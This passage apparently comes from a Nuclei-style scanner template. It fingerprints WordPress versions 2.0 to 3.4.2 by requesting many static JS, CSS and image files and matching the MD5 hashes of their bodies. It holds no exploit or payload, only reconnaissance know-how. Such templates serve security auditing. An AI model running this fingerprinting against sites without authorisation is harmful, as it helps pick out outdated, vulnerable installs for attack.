"{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.css" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"3888e9f93e218814c97a146069d104f1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.js" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"e363e3b8839e5db9fa0260eeabfac23e\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"ead9e5f733592ae8f9b227507de37ee6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.dev.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"ed882314c841932770eab4413337b4b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/colorpicker.dev.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"a513cd35728deb3db7dcb9b75da0a62d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-pointer.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9fb67c2257a8111e496014c2d2f3a930\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"42396561deb435781feb07f63e7c6039\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ui.css" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"a2992e048f28ae11937e337d5d7c9be7\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"be18fcaa0cd42745ac9c405543a1336b\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"0e570cb840d2c73dcd7df92be165f9e9\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"a464cac9829cb4b064c6e3f91fcccb7c\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"924d870e2ef4a1e18fb47fe5bccf7111\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"dfe72f9deb99c91098ba3b1b11f63e50\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"0a25f1ee5635ea5c98d12fe6a25124dd\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"367a7bc01297b49618ee3900b424d1d9\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"fda7ac60d42b36416c6f1590929cc2a7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.dev.js" - matchers: - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"21df9dbdbe1be96d4e1822bf08513a04\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.dev.js" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"ed402838f592c94f7193ea14f8b6080d\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"2a77fd1e668cca9cc75779f9a5f1e912\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/json2.dev.js" - matchers: - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"74d903049683e5bbea9ccb7544a42bca\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"8b5970b79549b145296e6ec137eb5edb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-base.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"96113df5c6d74956eaa855233e4740b2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-arrow-frame.png" - matchers: - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"91eb07c759f3fcd0b8ec0d8d50004657\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-dark-rtl.gif" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"b6f525c71c056ecedfd837daf18c3c4a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/logo.gif" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"a402ef261eb443496e6179f6e9653d29\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"31ab13232b3f67b49412db6f08f0ece7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/button-grad.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"16609cb9ee7897725e7692c17e9c29e4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav-vs.png" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"8720fba5c7c55ff7becb4c1ee4bff05b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/ed-bg.gif" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"58d491c508be7f09809f11bca4a1bd77\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/logo-ghost.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"c406a787e10714b99129ff7dff95efcd\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"bcf478ea9e8c426afefd159d7377ddee\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"5bc579022c0e93463d3bab42e8f236ed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/upload-fresh.png" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"aadb80b7f4e866a8568035b4dd32e55b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-dark-rtl-vs.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"c5550106c0be4db9a6960d0e3de2e3ff\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/widgets-arrow-vs.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"712a381eb9ac71764ea4a79febdc7cc5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-bits-rtl-vs.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"bfafda149631a7526d0d13c405898411\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"622bc5e4f63493c37b114406561c5de5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/upload-classic.png" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"7919cd151cfb4b0af5fd524f0e446635\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/toggle-arrow-rtl.gif" - matchers: - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"da61f45c1385ee6ed1663676eec4aed2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-bits-vs.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"6427a352215dc555ad24e26db148136c\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"b1627ef5a5aad512136dcef1213763ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"35ec77238a48560932bf6165a6db7e6c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/gray-grad.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"c5fd1e0895b8dec4db822fa9a3f7b92d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screen-options-toggle.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"b170bba2b2871a230b24c74f4aae6357\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-bits-rtl.gif" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"7d173c47b0f3e0466298a2d6d32b039b\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"e432360b7566ff59bd6c7b4df564b713\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-arrow-frame-rtl.png" - matchers: - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"c9de2cf71ae15d6c01a8083dcd8e71e8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/ed-bg-vs.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"470e06ad98e744340ad5e90b11e3dce6\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"01112dae05c7c37e16eeb3647c138a66\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav-arrow.gif" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"c6b4cb163011e316835b02d5b277ee8a\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"e46967a00b05a38fc0a09933d8e007a3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fade-butt.png" - matchers: - - type: dsl - name: 2.0 - 3.4.2 - dsl: - - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/white-grad-active.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"6b6d2eab57230f1d2afd4b6d9380fd1c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-dark-vs.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"61bf26628d82152b801159a463aced6b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/button-grad-active.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"cadd565a465b3eb73ed386c210145fe2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav-arrow-rtl.gif" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"4372297e02320aa8bf7165b8d943a1ee\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"8dcc7939100a91147bb7fb6d2a651bec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/widgets-arrow.gif" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"e46967a00b05a38fc0a09933d8e007a3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/loading-publish.gif" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"27c1513ac7487e7d4e09fd57d85dd15c\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"26166f102406bf94c0eb9f1f11987e1f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screen-options-toggle-vs.gif" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"c3b5488f52e8e14daf595669d6fa7dc5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-dark.gif" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"a5af317b01fd87c8eceedef87ae0c26f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wpspin_dark.gif" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"5bf61d27a7893daaf24bb158fddb550a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/required.gif" - matchers: - - type: dsl - name: 2.6 - 3.4.2 - dsl: - - "(\"449bfee22ffa295314e08b314604cd0c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/archive-link.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"9be05a7e7b41b72e75a2beddc4f6ac55\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/blue-grad.png" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"91db2f4ffe2102d84a160bfb4492b3e1\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"e475da9341c39501f1c29e29756942f8\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"43a14f5250893e36377b90d5f6200913\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/theme-customizer.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"d19352b8d4c1ac5b0db05e44dc93f80d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/twitter-embed-1.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"b0c7cba6fb42e9afa3f3bf8b6f21f71f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/twitter-embed-2.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"3b84d054f2c183a602f4941690a83575\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-media-library.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"702ae887ca351fbb1794d8f8e7860c4b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-1.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"d46f56d75c89ca7083560530051ef334\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-3.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"1adf3bac99c016f80215aa226c48295d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/flex-header-2.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"81d618181b57d8786f71a2dc508170bd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/captions-2.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"12e1605c70d4d4a3f103d16ddb89d303\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/captions-1.png" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"6e0bcf9f07953c75f042aa7f2d6a9be9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/toggle-arrow.gif" - matchers: - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"a3722fea95a66f24f350f36147bc8beb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-arrows.gif" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"f8872ea252d5551b77eff89ff7c74dcc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-bits.gif" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"98b4f1bc5b04e9964db57b8345436465\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"f8e09b1fc524fd96735945077d401793\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/white-grad.png" - matchers: - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"3090f8947eac64830900abf4562ca8e1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-controls.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"bfada11d185cf2a3e07371451948683a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/media-rtl.dev.css" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"ed5e5527b5bd5a5bca516e801dc1dc0b\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"29596814b742292023791add824b4781\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"b6c8a448b7deb1e19bf999ea1872b2e3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-fresh.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"eb885d8ae8efe89bebd275b7c0233552\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"fecf01b0229d493c31d174dce74dde32\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"1e25dcdb02e549022ccf4ac957c7b75f\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"5c6da03afe099af85d469f664b133764\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"4ce899e03ff74ffd8d9f31378d797812\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"c02acafde9e56854f48cd9943340eebe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-classic.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"3b28c60d90878ef48406da99ac5389ac\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"85859614659bc971b6d6b98974d2c566\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"7598767c9c2dd108013717a842210df9\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"ca960e93a6b9c81f3652cee6431369dd\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"ba959fd28fc932b50466eb8e6c063c73\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"5b533d8d6bbbf363974acbb2bcd9adfd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ie-rtl.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"c17172cffb8640db9ad587ecc3066c93\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"e14594097d99bae64e75387fc935c1e2\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"ff630250c416d6e8e30e688efec04ca7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"0fb82a1dfce256376ec3d4f11a542d1d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ie.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"95d14418c8e26f1bc619003f989e7d7f\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"499cf9148a1b0e615afdb375f7222bf9\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"be21783cf596914ce91198a75a50ec44\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"434caaf1626b334d24612792b1db03c9\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"9de10912b5256d5d5f26e5120bff3d38\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/tags.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"43beb69ddff35f898e5b249f7b317ff1\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"7aa22c8e635f9cba0be4254f4a3fa48d\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"0634ce262577c85d6c6d662bc383fcfa\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"0c20f6f7180474cb13d6e8caafa596e3\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"e4b154ca2cd2b7905582930f6be58ce8\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"4d39fa68e503ff895b3896b8b30ca544\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/categories.dev.js" - matchers: - - type: dsl - name: 2.9 - 3.4.2 - dsl: - - "(\"6fc0b70ea1595374c54e9d51aad4aa7f\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"cbb0371ccea124798628e181ca157a55\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/image-edit.dev.js" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"5802e534c29de67f2f456a48e5f633a0\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"0a91130aa8c3188c4b753fab5cab353e\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"dd82b12700f27be19c4c5df274abbb88\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"6e43e77b45b35fab9001873b804cc81b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/comment.dev.js" - matchers: - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"cd01b2bc20a1763b041cd4fe70b30ca8\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"08b5b8ab20cb303154b7bd30d29f627a\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"ebdf0f396c101af015d57df13c8e825b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/cat.dev.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"ed5cc1456007f3712e9722ea27253bb2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/word-count.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"86f1a330bd23226e1e7f50887e7f9ab0\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"6db343e221160c751aa5420855fd1752\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"2e2c9c93a59d78c9004c4359a2a05161\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/gallery.dev.js" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"c46e25f07876b469e084d9b0696ea235\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"188c746de47639e85ff7fc0f96ca8e85\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"14ad780f47e56304e6f5a65f909743e5\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"eb4e740117c8ff840c0bad6c23cdffbe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/inline-edit-tax.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"95ccf893a74335adbc415a57f81a41be\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"0e8df5b2f2da4173eaecd2cfa5cc8ef9\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"77b5a63d3b95598a6ce8b45f2ae03ee2\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"23d59c5aefc3f6f0b809e3972ba19403\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media-upload.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"022faf86405feb359e17b4f00e0491cd\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"df8b4a0fa85f7535c8e4ef90a7998111\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"c1bcdb3c4694c506dd64e900d12cc7a5\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"2a55cde57cdb0c810aec27fdc928e1ef\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"88f97460af4cc2a479623d2f37b7005c\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"61af37c5377935cadec17885b0f46e99\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/password-strength-meter.dev.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"b3d62fe0166b74696d6bc96159abdccd\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"2072440d1515a541623bd1ef77373c12\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"11983cbe1e9207fcc68697e52d0cfdc9\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"e2386aeb18a7e95549bcb3b525bf8b57\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"eee80fc95481ecce7de5e9f08b0574cc\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"603da6c24a56664fe3a7bc8385cba89e\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"2e994cfc7fab553a8e74b80e3eda766d\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"d7a59df48993c4bd784b2218a9316942\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"b54c11ff884ea8fcfe6e821835638da2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/inline-edit-post.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"984b28a60bb245d1f91b1e1fe20ad867\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"85a780cab162664a08008fcfea5d1c67\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"11651d7c4cea9f0273e64bda5ae07a17\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"434b94f0e74fb7bf6a765cfaee697ba6\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"350b59d8f40f7cb12636382c8a3c85c5\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"9c7423f80c6bc4ad794dfe32dd94c0df\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"0803e8b6ee18cfba4bf61503f40fe9dc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/user-suggest.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a475074c6a346983f461e0ee48269edb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"2ea3d0d07d00e3f41408e089b045c670\" == md5(body))" - - type: dsl - name: 3.1 - 3.3.3 - dsl: - - "(\"511734a3a18fc5016a8303d2a09b2143\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"59e0962c585c570c002435286795dd58\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"05d8ade5450dee08850a83ca890337e5\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"82151afee85ea31377c2d756319d8d87\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/editor.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"76567247a25ead81490b314336f0ac46\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"fa25cfc4c116b07580ab020af64721bb\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"b2645f30b7eb489d445895339405df77\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"21c67587ab462f90784f926d8596548e\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"779691c2375a8ec0f675bbda1fd6e376\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"5237280cf062f0466e1bb2c52b7585fe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/xfn.dev.js" - matchers: - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"d627144ce38e26b1b1fd91b5dcb503ff\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"e15936905405f555f881091a8d1ec95f\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"07f6405c0e3617f34ce1d404088fe2bb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"aa10d449951b0d66e994c71b89b27912\" == md5(body))" - - type: dsl - name: 3.1 - 3.3.3 - dsl: - - "(\"4e0dc911afce054cfeb93359fa43ec72\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media-gallery.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"365f0de914a67921ec1ca7f2c1f6c7fc\" == md5(body))" - - method: GET - path: - - 